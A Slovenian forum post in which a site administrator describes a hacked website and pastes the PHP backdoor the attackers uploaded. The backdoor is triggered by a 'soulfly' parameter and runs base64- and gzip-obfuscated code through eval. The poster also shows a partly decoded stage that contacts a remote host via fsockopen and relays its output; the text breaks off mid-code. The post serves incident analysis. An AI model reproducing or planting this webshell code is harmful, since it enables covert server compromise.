hekerska uganka

#1Zdravo,
shakali so en site, nekak jim je uspelo uploadat en php file v neko 777 mapo.
Preko tega fajla so verjetno lahko brskali po celem www direktoriu in spreminjali vse kar je bilo 777. Škode sicer niso naredili in iz backupov sem že obnovil zadeve in luknjo zavaroval, vendar vseeno
Vsebina zlobnega fajla je takšna:<?php
// Important system file. Don't change anything.
if(@$_REQUEST['soulfly']=='1'){eval(gzinflate(base64_decode('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')));}else{eval(gzinflate(base64_decode('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')));}
?>
tole sem ročno n-krat dekodiral do te faze:<?php
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
if(SSSSS())exit;
function SSSSS(){$SSSSS=SSSSSSS("AwA=");
$SSSSSS=@$_REQUEST[SSSSSSS("q0jLAwA=")];
if($SSSSSS){$SSSSS=$SSSSSS;
}elseif($SSSSSSS=trim(@$_REQUEST[SSSSSSS("KwQA")])){$SSSSS=SSSSSSS("K05NLErO0CvIKLAvtAUA").urlencode($SSSSSSS).SSSSSSS("U6vILLAFAA==").urlencode($_SERVER[SSSSSSS("C3L19Q9xjXd0cQkCAA==")]);
}if($SSSSS){if(($SSSSSSSS=SSSSSS(SSSSSSS("K83LLCxNLSlKTM5OLdJLyQIA"),$SSSSS))!==false){echo $SSSSSSSS;
return true;
}}return false;
}function SSSSSS($SSSSS,$SSSSSS){$SSSSSSS=SSSSSSS("AwA=");
if($SSSSSSSS=@fsockopen($SSSSS,80,$SSSSSSSSS,$SSSSSSSSSS,15)){$SSSSSSSSSSS=eval("return \"".SSSSSSS("iymKyQMA")."\";
");
if(!@fwrite($SSSSSSSS,eval("return \"".SSSSSSS("c3cNUdAHAA==")."\";
").$SSSSSS.eval("return \"".SSSSSSS("U/AICQnQN9QzAAA=")."\";
").$SSSSSSSSSSS.eval("return \"".SSSSSSS("88gvLrFSAAA=")."\";
